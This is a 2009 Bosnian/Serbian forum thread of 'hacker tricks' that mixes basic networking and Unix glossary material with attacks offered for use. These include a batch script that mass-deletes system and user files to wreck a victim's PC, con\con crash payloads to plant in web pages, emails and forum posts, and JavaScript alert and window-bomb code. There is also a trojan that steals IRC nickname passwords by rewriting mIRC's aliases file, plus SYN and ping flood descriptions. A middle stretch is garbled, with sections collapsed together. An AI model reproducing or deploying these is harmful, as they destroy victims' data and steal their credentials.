Net Wizards world!!!!

Genijalci sa Balkana to smo mi!!!!
 
PrijemPrijem  KalendarKalendar  Često Postavljana PitanjaČesto Postavljana Pitanja  TražiTraži  Registruj seRegistruj se  Lista članovaLista članova  Korisničke grupeKorisničke grupe  PristupiPristupi  

Delite | 
 

 Hakerski fazoni

Pogledaj prethodnu temu Pogledaj sledeću temu Ići dole 
AutorPoruka
Hacker1

avatar

Broj poruka : 19
Godina : 22
Datum upisa : 09.08.2009

PočaljiNaslov: Hakerski fazoni   Ned Avg 09, 2009 11:36 pm

 Sadrzaj
----------

1. Ko su to hackeri, crackeri, lameri?
2. Komande u Unixu
3. "Zloupotrebljiv" fazon u BATCH programima
4. Razlika izmedju TCP i UDP protocola.
5. Kako saznat IP adresu? 
6. Srusite system komandom: c:\\\\\\\\>CON\\\\\\\\CON
7. Otkrivanje uljeza.
8. Hackanje nickname password-a.
9. Nacini kako srusiti(zablokirat) 
neciji system pomocu obicne Web stranice
10. Sakrijte vasu IP adresu dok chatate
11. Source code za hackanje nickname passworda
12. Pa sta vise znaci ono 1010000101010101?
13. Prebacite datoteku BAT u COM
14. Sta su to DoS napadi i vrste DoS napada
15. Kako na Windowsu iskljuciti MS-DOS prompt?
16. Sta je to HTTP, HTML...?
17. Sta je to buffer overflow?
18. Sta je to backdoor?
19. Sta je to "Daljinska kontrola"?
20. Odjavna rijec autora
---------------------------------------------------



1.* Ko su to hackeri, crackeri i phreakeri?
---------------------------------------------

* Ko su to hackeri?

Ovaj tekst sam napisao jer mi je dosta da me mnogi pitaju sta je to haker, sta on radi i slicno. Pa da krenem. Sama rijec "hacker" potjece od engleske rijeci hack (eng. hack = rana, posjekotina) i u mnogim englesko-bosanskim rjecnicima pisat ce da hacker znaci kompjuterski provalnik. Iz tog se odmah moze zakljuciti o cemu se radi. Medjutim ja cu ovdje pojasniti mnogo detaljnije i dokazati da ova definicija u biti nije tacna. 

Moja neka definicja hakera bi glasila: Haker je ona osoba koja voli racunare, istrazuje racunarske sisteme i otkriva propuste koji su nastali na odredjenom sistemu i posjeduju ogromnu kolicinu znanja iz odredjene oblasi i to znanje ne koriste za zlonamjerne svrhe, racunare imaju kao glavni interes. Otprilike tako bi glasila definicija hakera. Znaci, haker je osoba (obicno u dobi od 15 do 25 godina) kojoj je glavni interes racunar. Premda haker moze biti u svim oblastima racunara (web dizajna, grafike i sl.) danas je haker onaj koji istrazuje RACUNARSKU SIGURNOST. Dakle to je oblast informatike koja se bavi sigurnoscu racunara (ne fizickom sigurnoscu), da obezbjedi siguran tok informacija kome su one namjenjene, da zastiti neautorizovane pristupe i sl. 
Nesto sto je veoma bitno a to je da HAKERU NIJE CILJ CINITI STETU. Danas mozete u novinama, na TV-u itd. procitati kako je neki haker probio u banku, osudjen na toliko i toliko godina itd. Medjuim, to NISU HAKERI. Hakeri su oni koju "probijanju" u odredjene sisteme i time NE CINE STETU. Dakle haker je onaj koji je probio u sistem neke banke i nije nista novca ukrao ili nesto izbrisao i sl. A oni koji svoje znanje koriste u zlonamjerne svrhe, recimo kradja kreditnih karticu i cista sabotaza, oni se nazivaju CRACKERI (krekeri). Cracker moze imati i vise znanja od nekog hakera, medjutim on to znanje koristi u ilegalne svrhe i tako dolazi u dodir sa zakonskim normama. Da bi se hakeri i crackeri razlikovali po onome sta rade, postoji hakerska etika. Svaki haker se mora pridrzavati hakerske etike da bi imao tu casnu titulu "haker". Izmedju ostalog, hakerska etika kaze da hakeri ne smiju praviti diskriminacije medju nacijama, vjerama, boji kozi, polu i sl., znaci, ljude procjenjuju po tome kako oni misle i znaju, a ne po tome kako izgledaju. Pogresno je sto mediji cesto zamjenjuju hakera sa crackerom. Kako sam malocas spomenuo, hakeri se danas fokusiraju na racunarsku sigurnost. Njima je cilj probiti u neki sistem iz ciste radoznalosti i time povecavati svoje znanje. "Pravi" haker nakon sto otkrije neki propust u sistemu, obavjesti administratora tog sistema o gresci koju je otkrio kako bi je administrator popravio/nepopravio. I sada se siguro pitate zasto to rade, sta imaju od toga? To pitanje ne postavljate samo vi, nego cijeli savremeni svijet, svi se pitaju zasto to hakeri rade. Tacno je da oni nemaju neke materijalne koristi od toga ustvari imaju samo gubitke (placanje Internet racuna, telefona, struje itd.). Medjutim, to hakere ne sprijecava da rade ono sto zele. Kako vidite, hakeri su veoma, veoma cudne osobe. Veoma su sutljive osobe, povucene (kao ja :-) itd... Inace, sve sto rade, rade zato sto ih to zanima, jednostavno to ih interesuje. U danasje vrijeme (barem u BIH) svo znanje koje imaju hakeri moze im samo dobro doci. Medjutim u nekim razvijenim zemljama hakeri mogu biti jako dobro placeni. Evo vam npr. firma Microsoft. Microsoft ima svoj poseban security team u kojem rade vise-manje "pravi" hakeri. I naravno za to su dobro placeni. Ili recimo u nekoj vladinoj agenciji kao sto je NSA, DoD (Department of Defense), NSCA, FBI, CIA itd... Pa cak i u nasoj drzavi ima nekih firmi koji zaposljavaju ljude strucnjake za sigurnost, recimo Whitefield Coputers, BIHNET itd. I tu neko mora voditi sigurnost zar, ne? Dobro to sad i nisu oni hakeri koje sam ja opisivao to su obicni neki tzv. "strucnjaci" za sigurnost koji imaju odredjene certifikate (CISCO, Microsfot itd.). Moze se reci da danas postoje dvije grupe hakera. Prvu grupu bi cilini oni hakeri u "podrumima" sa "pepeljarama" na ocima koji su i dan i noc za racunarom, i disu i jedu racunar (ja te najvise volim :-). I drugi bi bili oni koji se visoko obrazuju, imaju certifikate za sigurnost itd. Ti se obicno zaposle u velike firma i imaju dobru placu (npr. ako ste gledali film "Takedown", Kevin Mitnick bi spadao u prvu grupu, a Shimomura u drugu Smile. Stvar je u tome da osobe koje su strucne za sigurnost tesko mogu naci posao u BIH. Tako da i nemaju interesa da postanu hakeri (izuzev mene :-). Bitno je reci i predmet proucavanja hakera. Prije svega, da bi imali visoku kontrolu nad racunarom, moraju ga poznavati jako dobro/duboko. Operativni sistem koji koriste je prije svega Unix/Linux (iz milion razloga koje ja sad ne bih pominjao). Da bi ostvarili visoku manipulacju nad racunarom, programiraju u Asembleru ili C-u. Inace, provaljuju (proucavaju) operativne sisteme, mrezne sisteme, servise (deamone), mreze (LAN, WAN, Wireless itd.), protokole i itd... Postavlja se pitanje: "Kako to cine?". Odgovor na to pitanje necete dobiti u ovom tekstu i ne mozete ga razumjeti ako se sami ne ukljucite "u te vode". I na kraju mogu samo reci da je jedno sigurno: "Sve je nesigurno", svaki put kada se spojite na Internet izlozeni ste svijetu, svijetu u kojem vladaju mozgovi sa posebnim nacinom razmisljanja, mozgovi koji su zeljni istrazivanje, mozgovi koji mogu pristupiti vasem racunaru, mozgovi koji se zovu HAKERI...


* Hakerski manifest
------------------------

Mi istrazujemo - i vi nas zovete kriminalcima. Mi trazimo znanje - i vi nas zovete kriminalcima. Mi postojimo bez boje koze, bez nacije, bez religie - i vi nas zovete kriminalcima. Vi gradite atomske bombe, vi zapocinjete ratove, vi ubijate, varate i lazete nam i pokusavate nam umisliti da je to za nase dobro, ipak mi smo kriminalci. Da, ja sam kriminalac. Moj zlocin je zlocin radoznalosti. Moj zlocin je to da ja procjenjujem ljude po onome sta oni kazu i sta oni misle, a ne po tome kako oni izgledaju. Moj zlocin je da vas prevarim, nesto sto mi vi nikada necete oprostiti. Ja sam Haker, i ovo je moj manifest. Vi mozete zaustaviti jednog, ali ne mozete zaustaviti sve nas...

* Ko su to crackeri?

Za razliku od hakera, crackeri su stetocine.
Oni imaju za cilj da ukradu odredjene podatke sa necijeg racunara, i koriste ih za vlastite svrhe. Takodjer, oni znaju napraviti viruse, trojance ali problem je u tome sto ih koriste za ilegalne svrhe, i time ostvarujuci svoje ciljeve.

* Ko su to lameri?

Jednom rijecju lameri su hvalisavci. Oni koriste programe koje su napravili crackeri/hackeri. Medjutim, oni nemaju znanje, vec koriste tudje znanje, i tvrdeci da je to njihovo djelo.
Obicno rade ono sto je vec otkriveno, napravljeno itd.


2.* Komande u Unixu 
---------------------------

  ar -arhiver
  at -izvodjenje naredbe u odredjeno vrijeme
  awk -jezik za trazenje i obradu uzoraka
  bash -korisnicka ljuska , Bourne Again SHell
  bc -kalkulator proizvoljne preciznosti
  biff -javlja korisniku da je stigao mail
  cal -ispis kalendara
  calendar -podsjetnik
  cat -ispis datoteke
  cc -C kompajler
  cd -promjena radnog direktorija
  chfn -promjena informacija o korisniku
  chmod -promjena prava prisutpa datoteci
  chown -promjena vlasnika datoteke
  chgrp -promjena grupe datoteke
  chsh -promjena inicijalne korisnicke ljuske
  clear -brisanje ekrana
  cmp -usporedba datoteka
  compress, uncompress -kopresira i odkompresira datoteke
  cp -kopiranje datoteke (ili direktorija)
  crypt -sifrira i desifrira datoteku
  csh -korisnicka ljuska u kojoj sintaksa podsjeca na C sintaksu
  date -ispis vremena i datuma
  dc -stolni kalkulator
  diff -usporedba datoteka tj. direktorija
  df, du -ispis statistike upotrebe diska
  echo -naredba za ispis
  elm -program za citanje i pisanje poste
  expr -racuna izraz
  find -trazi datoteku
  finger -daje informacije o korisniku
  from -ispis posiljaoca novopristigle poste
  ftp -program za prenos podataka 
  gopher -naredba za rad s gopher servisom
  grep -trazi uzorak u datotekama
  gzip, gunzip -kompresira i odkompresira datoteku
  head -ispis prvih linija datoteke
  hostname -ispis imena tekuceg racunala
  id -ispisuje id broj korisnika i gid (id broj grupe)  
  irc -naredba za rad s irc servisom
  joe -teksutalni editor
  kill -salje signal procesu (ako ne specificiramo signal ubija proces)
  ksh -korisnicka ljuska, Korn shell
  leave -alarm, podsjeca korisnika na vrijeme za odlazak
  line -cita liniju sa standardnog ulaza
  ln -stvara vezu s datotekom ili direktorijem
  lock -rezervira terminal, zakljucava terminal
  login -'prikljucenje' na racunalo, pocetak rada
  logname -ispis korisnickog imena
  ls -ispis sadrzaja direktorija
  mail -program za slanje, citanje poste
  mailx -program za interaktivni rad s postom
  man -manual, prirucnik
  mesg -omogucava ili onemogucava slanje poruka od drugih korisnika
  mkdir -kreira direktorij
  more -ispis datoteke (ispis stane na svakoj stranici)
  mv -pomice datoteku ili direktorij
  netstat -prikazuje status mreze
  newgrp -prelazak u novu grupu
  nice -mjenja prioritet izvrsavanja
  nohup -cini naredbu imunu na prekide i odlogiranje
  nroff -program za formatiranje teksta
  od, xd -ispis datoteke oktalno, heksadecimalno
  passwd -promjena passworda (lozinke)
  pico -tekstualni editor 
  pine -program za citanje i pisanje poste
  ps -ispis procesa
  pwd -ispis imena tekuceg direktorija
  quota -ispis upotrebe diska i ogranicenja za korisnika
  read -cita liniju sa standardnog ulaza
  rlogin -prijava za pocetak rada na udaljenom racunalu
  rm -brise datoteke
  rmdir -brise direktorij
  sed -sljedni tekstualni editor
  sh -korisnicka ljuska, Bourne shell
  sleep -odgadja izvrsenje za neko vrijeme
  sort -sortira datoteku
  spell -trazi i ispisuje gresku u spelovanju (za engleski jezik)
  stty -postavlja opcije za terminal
  su -postaje superuser ili neki drugi korisnik
  tail -ispis zadnjih linija datoteka
  talk -program za razgovor izmedju dvije osobe
  tar -arhiver za datoteke
  tcsh -korisnicka ljuska
  tee -kod pipe-a omogucava ispis na ekran i u datoteku
  telnet -korisnicko sucelje za TELNET protokol, rad s udaljenim racunalom
  time -mjeri vrijeme izvrsavanja naredbe
  tin -program za citanje i pisanje clanaka na USENET-u
  tn3270 -program za emulaciju 3270 terminala na tekstualnom terminalu
  tr -zamjenjuje znakove
  tset -incijalizacija terminala
  ttytype -program za identifikaciju terminala
  umask -ispis i postavljanje maske za kreiranje prava pristupa datotekama
  uname -ispis verzije i vrste operativnog sustava
  uniq -sprjecava ponavljanje istih linija kod ispisa
  uptime -ispis vremena rada racunala, broja korisnika i opterecenja
  users -ispis liste aktivnih korisnika
  uuencode, uudecode -programi za (de)kodiranje binarnih datoteka
  vi -ekranski orjentirani editor
  wall -slanje poruke svim aktivnim korisnicima
  wc -brojac rijeci, linija i znakova
  whereis -locira izvrsni program ili stranicu prirucnika (manuala)
  who -ispis liste aktivnih korisnika sistema
  whoami -ispis efektivnog id korisnika 
  write -slanje poruke drugom korisniku
  wall -salje poruku svim korisnicima na sistemu
  xargs -kreira listu argumenata za drugu naredbu
  xv -program za prikazivanje slika (samo za graficki terminal)
  zsh -korisnicka ljuska


3.* "Zloupotrebljiv" fazon u BATCH programima
-------------------------------------------
* Ovdje cete naci nacin kako da nekome "unistite" racunar i to vrlo jednostavno.
E idemo ovako.

* Sve sto je potrebno jeste da napravite fajl u BAT formatu. To mozete napraviti na mnogo nacina
npr. u DOS-u utipkajte: COPY CON PROGRAM.BAT, pricnite ENTER i upisite ove komande: (kada zavrsite pricnite tipku F6)

-Komande:

echo off
cd..
cd..
cd..
attrib -r -h -s
del *.exe
del *.sys
del *.com
del *.dat
del autoexec.bat
del *.lnk
del *.his
del *.wav
del *.mp3
del *.ini
md garnet
cd windows
attrib -h -r -s
del *.exe
del *.com
del *.sys
del *.mp3
del *.wav
del *.dat
del *.lnk
del *.ini
del *.log
del autoexec.bat
del *.txt
del *.bak
del *.htm
del *.gif
cd system
attrib -r -h -s
del *.dll
del *.exe
del *.sys
del *.386
del *.dat
del *.com
del *.ini
cd..
cd..
cd..
cd mydocu~1
attrib -r -h -s
del *.exe
del *.txt
del *.bmp
del *.wav
del *.mp3
del *.sys
del *.com
cd..
cd windows
rd *.*
cd..
cd..
rd *.*
del *.*

REM This program is copyright by [GARNeT]

* I to je to. Dovoljno je ove komande dodati u BAT fajl koji vi napravite.
A kao sto vidite program brise datoteke sa odredjenih direktorija. Jednostavno,
onemogucava rad same masine, jer systemske fajlove brise.

* Paznja: OVO NIJE VIRUS!!!
 

 
Smile
Nazad na vrh Ići dole
Pogledaj profil korisnika http://ZABAVA.BIG-FORUM.NET
Hacker1

avatar

Broj poruka : 19
Godina : 22
Datum upisa : 09.08.2009

PočaljiNaslov: Re: Hakerski fazoni   Ned Avg 09, 2009 11:37 pm

4.* Razlika izmedju TCP i UDP protocola.
----------------------------------------
Razlika izmedju TCP, i UDP protocola je u tome sto TCP protocol prenosi
podatke dok je veza uspostavljena, a UDP prenosi podatke neuspostavljajuci vezu.
TCP/IP je skupina protokola koja sluzi za komunikaciju medju racunarima.
Sada mozete vidjeti najpoznatije protocole i portove na kojima rade, ovo
su User Services, tj. da korisnik moze koristiti ove servise.

FTP (File Transfver Protocol): prenosi fajlove sa jedne
na drugu masinu. FTP za transver koristi TCP.

TFTP (Trivial File Transfer Protocol): prenosi fajlove
koristeci UDP.

TELNET: omogucuje remote login sto znaci da korisnik moze
da se konektuje na drugu masinu u mrezi i koristi
je kao da sedi za njenom tastaturom.


- Gateway Protocols: ovi servisi pomazu prenos podataka i status
informacija preko lokalnih mreza.

EGP (External Gateway Protocol): prenosi routing
informacije za eksterne mreze.

GGP (Gateway-to-Gateway Protocol): prenosi routing
informacije izmedju internet gateway-a.

IGP (Internal Gateway Protovol): prenosi routing
informacije za interne mreze.

Evo vam primjer za TCP protocole. To je ovaj servis TELNET, jer on prenosi podatke
dok je veza uspostavljena, dok TFTP prenosi fajlove koristeci UDP protocol, tj. kada
veza nije uspostavljena. 

* Portovi na kojima protocoli rade:

21 ftp
23 telnet
25 smtp
37 tcp time
70 tcp gopher
79 tcp finger
109 tcp pop-2
110 tcp pop-3
111 tcp sunrpc
113 tcp auth
143 tcp imap
513 tcp login
514 tcp shell

5.* Kako saznat IP adresu?
------------------------------------------

* Komandom Ping mozete doznat IP adresu neke web stranice.
Takodjer, mozete i preko www.netcraft.com dobiti jos neke
informacije o nekom sajtu.

Primjer:
C:\\\\\\\\>ping www.nhc-team.org

6.* Srusite system komandom: c:\\\\\\\\>CON\\\\\\\\CON
-----------------------------------------

* Sta je Con\\\\\\\\con?

Ovo je bug windows kernel systema tj. bug u upravljanju driverima u IO.SYS,prouzrokuje da se kernel istopi.Pojavi se blue screen i za nekoliko sekundi se komp zakoci.I onda moramo da ga resetujemo.

Kako da iskoristimo con\\\\\\\\con?

Postoji nekoliko nacina da iskoristimo ovaj bug.
Ja sam nabrojao nekoliko.

1.kucamo u command promtu start c:\\\\\\\\con\\\\\\\\con
2.Napravimo web stranicu koja ima sledeci kod:

meta http-equiv="REFRESH" content="3; URL=file:///c:/con/con"

3.posaljemo nekome mail sa kodom koji je prikazan gore.
4.Ako neki win98 system ima Frontpage Webserver mozete srusiti masinu

http://www.a_win98_site.be/con/con

5.Jos jedan html tag IMG SRC="c:\\\\\\\\con\\\\\\\\con"
6.Mozete srusiti korisniku komp ako na forumu na kome je html enabled post-ujete poruku tipa 

meta http-equiv="REFRESH" content="3; URL=file:///c:/con/con"

7.Ubacivanjem HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\CLASSES\\\\\\\\exefile\\\\\\\\shell\\\\\\\\_
otvoreno sa vrednosti c:\\\\\\\\con\\\\\\\\con c:\\\\\\\\con\\\\\\\\con "%1" %* ce takodje srusiti system.


NETSCAPE ce ako stavite file:///c:/con/con prebaciti link u file:///D|/c:\\\\\\\\nul\\\\\\\\nul
zato ne stavljajte file:/// vec samo c:\\\\\\\\con\\\\\\\\con


7.* Otkrivanje uljeza.
-----------------------

* Kako mozete doznati osobu na internetu koja vas je nukkovala, banovala, itd...?
Veoma jednostavno. Dovoljno je da zabiljezite IP adresu tog napadaca.
To je cifra kao npr. 195.222.45.211 Tu adresu svaki korisnik dobije od
svog provajdera dok je on-line, normalno ne istu adresu. E znaci morate
saznat tu IP adresu napadaca. To takodjer mozete saznati ako imate
firewall, jer u nekom log fajlu od firewalla zapisana je ta adresa. 
(malo pogledajte fajlove u firewall direktoriju, obicno su sa exstenzijom INI).
E kada ste saznali tu IP adresu, na sajtu: http://www.ripe.net/db/whois.html
mozete vidjeti mnogo informacija od tog napadaca, kao sto je provajder itd...
Ako se zelite zaliti tom provajderu kako vas je njihov korisnik uznemiravao, dovoljno je da posaljete mail na support@(neki provajer) npr. support@bih.net.ba dakle da posaljete mail
sa IP adresom napadaca i uz tacno vrijeme i datum napada. Jer provajder mora imati
tacno vrijeme i datum kako bi saznao koji vas je korisnik uznemiravao.
Evo vamo 2 primjera kako cete to saznat. Ako ste bili na IRC-u sa napadacem,
ustvari ako ste chatali, odnosno ako je vasa scripta snimila log fajl od tog chata,
vi trebate otvorit taj fajl, i pisace vas datum i vrijeme chatanja.
Drugi primjer je ako imate firewall onda u log fajlu koji je firewall zabiljezio,
naci cete te informacije.
8. Hackanje nickname password-a.
--------------------------------

NAPOMENA: Prvo sto trebate jeste da skinete program sa ove adrese: 
http://www.freeservers.com/nhc-dokumenti/programi/pass.zip, a zatim procitajte ovo dole!
 
* Uvod

Program "Password for nickname" napravio je [GARNeT]. Ovaj program sluzi
da "ukrade" nickname password na IRC-u. Dakle, ako zelite da od neke
osobe saznate password od njegovog/njezinog nicka, dovoljno je da ovaj
program "Password for nickname", posaljete toj osobi, i ta osoba treba pokrenut
taj fajl.

* Princip rada alata

Znaci, kada ste poslali ovaj program toj osobi, i kada je ona to pokrenula, onda
code radi svoj zadatak. Kao prvo, ovaj program radi samo na obicnom mIRC-u
i to na svim verzijama. Ako je neka druga scripta, onda nemoze.
Znaci, program radi tako sto ulazi u direktorij mIRC-a, tj u direktorij:
c:/Programs files/mirc, zatim brise fajl Aliases.ini, pravi novi i dodaje 
jedan code. I program je uradio svoj posao. Znaci, napravio je novi
fajl aliases.ini u mirc direktoriju. (mIRC mora biti u folderu: 
c:/Programs files/mirc, inace program nece raditi). E sada sve sto
treba jeste da osoba udje u mIRC i konektuje se na IRC. Kada ta osoba
izvrsi identifikaciju svog nicka, password od njezinog/njegovog nicka 
DOLAZI NA VAS MEMO. (MemoServ je jednostavan servis koji omogucava korisnicima da salju
kratke poruke jedni drugima, pa cak i kad je primalac offline).
E znaci kada je memo sa passwordom stigao, on nije stigao na vas nick,
nego na nick: code-pass, znaci vi se trebate konektovat na IRC pod nickom
code-pass i izvrsiti identifikaciji za nick. Password od ovoga nicka je: code333
I posao je zavrsen. Na taj nick poslije identifiakacije primice te memo poruku,
u kojoj se nalazi password od nicka te osobe od koje ste htjeli saznat password.
I to je to. I jos samo da napomenem da password NIJE kriptovan!

* NAPOMENA

Nickname: code-pass je kao sto vidite neki univerzalni nick, na koji stizu
poruke sa passwordima od nickova. Zato vas molim kada vidite password od
neke osobe tj. kad doje na memo, da lijepo fino promijenite nick u svoj
nick, da nedirate ovaj nick code-pass. Znaci, nemojte mijenjat password ili nesta drugo
od nicka code-pass jer ima osoba koje ce isto uraditi kao i vi. Zato MEMO zna biti
pun poruka sa passwordima Smile) Ako primjetite da nick: code-pass nemoze te identifikovat,
onda se meni obratite da napravim novo, ili eventulano saznam ko je to uradio (nesto je*o nick)
i naravno da ga kaznim Smile)


* Ako zelite da imate svoj program koji ce slati samo na vas nickname MEMO poruke
sa passwordima, onda mozete naruciti Smile)



9.* Nacini kako srusiti(zablokirat) 
neciji system pomocu obicne Web stranice
---------------------------------------------

* Pomocu obicne web stranice mozete nekome
srusiti system ili ga natjerati da 
mora resetovat masinu.

Evo vam nekoliko HTML kodova:

* 1.Ovaj primjer ce neprestalno otvarati jedan te isti dosadni 
prozorcic koji na sebi ima tipku OK i svaki put kad ga ugasite on
se ponovo upali i tako beskonacno.

---------------------------



var x = "never";
function killme() {
 while (x == "never") {
  alert("-Mi u Boga vjerujemo!-");
 }
}





---------------------------

* 2. Ovaj primjer otvara bezbroj puta browser 

---------------------------



msIE window bomber


  Sistem B : SYN ("Hocu vezu s tobom")
2) Sistem B---->Sistem A : ACK/SYN ("Dobro uzeo sam to uobzir)
3) Sistem A---->Sistem B : ACK ("Dobro,ja se takodjer slazem")

Sad se jednostavno u jednom SYN paketu daje pogresna adresa (jedna koja i nepostoji),
i time ne dolazi na sisitem B- paketa odgovor (ACK), jer i nepostoji adresa. 
Ali sistem B ceka jos odredjeno vrijeme na odgovo, sve dok ne dodje "connection timeout".
U tom vremenu se mora sistem B sa sto vise ping-ova prenapuniti. Posljedica je da se 
sistem B prenapuni, tako da za odredjeno vrijeme vise ni na jedan SYN-paket odgovori.

* Ping of Death

* Za ovaj napad sluzi obicna komanda koja glasi: "ping adresa -n 9999999"
Kada se posalje ova naredba na odredjeni server, onda on pocinje da obradjuje, ali
posto se poslalo oko milion pingova, onda server sporo obradjuje i jednostavno se
srusi, dolazi do buffer overflow (o ovome imate u tutorialu).
Medjutim za ove napade je davno izasao patch i nevazi na jacim serverima.
(Nemoze te koristit ovaj napad sa slabijim mashinama)

* To bi bilo to, jos samo da napomenen ono sto sam rekao na pocetku a to je da
se veoma tesko zastitit od ovakvih napada. Zato nabavite zastitu da vas lameri
neuznemiravaju bezze Smile)


15.* Kako na Windowsu iskljuciti MS-DOS prompt?
-----------------------------------------------

* Vrlo jednostavno mozete iskljuciti MS-DOS prompt.
Sve sto trebate jeste da startujete Regedit i otidjite na
lokaciju: 
HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\WinOldApp  
i dodajte DWORD vrijednost: Disabled i upalite akciju. (dodajte 1)
I to je to, vise nece biti MS-DOS prompt.
Ako ponovo zelite vratiti onda dodjelite vrijedost 0 umjesto 1.


16.* Sta je to HTTP, HTML...?
----------------------

* HTML (HyperText Markup Language)
Programski jezik koji se koristi za stvaranje hipertekstovnih dokumenata (dokumenata koji sadrzavaju linkove) na Webu.

HTTP (HyperText Transfer Protocol)
Protokol koji se koristi za prijenos hipertekstovnih dokumenata, tj. Web stranica.

HTTPS (HyperText Transmission Protocol, Secure)
Protokol koji sluzi za siguran prijenos podataka i Web stranica izmedju korisnikovog Web klijenta i Web servera. Podaci koji se razmjenjuju se kriptiraju, tako da ih neovlasteni korisnici ne mogu procitati. HTTPS protokol se koristi kada je potrebno razmijeniti privatne podatke, kao sto su passwordi kod koristenja raznih Web servisa, brojevi kreditnih kartica kod on-line kupovanja i itd...

 
17.* Sta je to buffer overflow?
-------------------------------

* Buffer overflow - prekoracenje bafera.
U toku izvrsenja programa u neku od programskih varijabli se unese vrijednost koja
je mnogo veca od ocekivane, prilikom cega dolazi do izvrsenja drugog proizvoljnog koda
obicno sa privilegijama roota ili administratora. Ovo je tezak problem i
jedino rjesenje je instaliranje najnovijih service packova kojima se ove greske
uklanjaju iz programskog koda.


18.* Sta je to backdoor?
-------------------------

* Pod ovim pojmom se podrazumjeva akcija koju haker poduzima na vec 
provaljenom systemu. Ako haker dodje do root lozinke, ona mu nece mnogo 
pomoci ako su servisi poput telneta iskljuceni. Zbog toga on ostavlja neku
vrstu tajnog prolaza na koji moze uci kada hoce i raditi sta hoce Smile)


19.* Sta je to "Daljinska kontrola"?
-----------------------------------

* Iako su programi za daljinsku kontrolu korisni, pogresna upotreba moze ih pretvoriti
u mocne alate hakera koji pomocu njih mogu preuzeti totalnu kontrolu nad systemom. 
Dovoljno je da ostavite praznu lozinku pa bi neko sa boljim port skenerom mogao 
otkriti da se na systemu vrti program za daljinsku kontrolu, te bi se prilikom
logiranja prijatno iznenadio vidjevsi da mu lozinka nije ni potrebna
Nazad na vrh Ići dole
Pogledaj profil korisnika http://ZABAVA.BIG-FORUM.NET
 
Hakerski fazoni
Pogledaj prethodnu temu Pogledaj sledeću temu Nazad na vrh 
Strana 1 od 1
 Similar topics
-
» Ljubivoje Ršumović
» Smehotresne priče, slike, vicevi, pisma, .... :)))

Dozvole ovog foruma:Ne možete odgovarati na teme u ovom forumu
Net Wizards world!!!! :: Na kvarno!!! :: Hack-
Skoči na: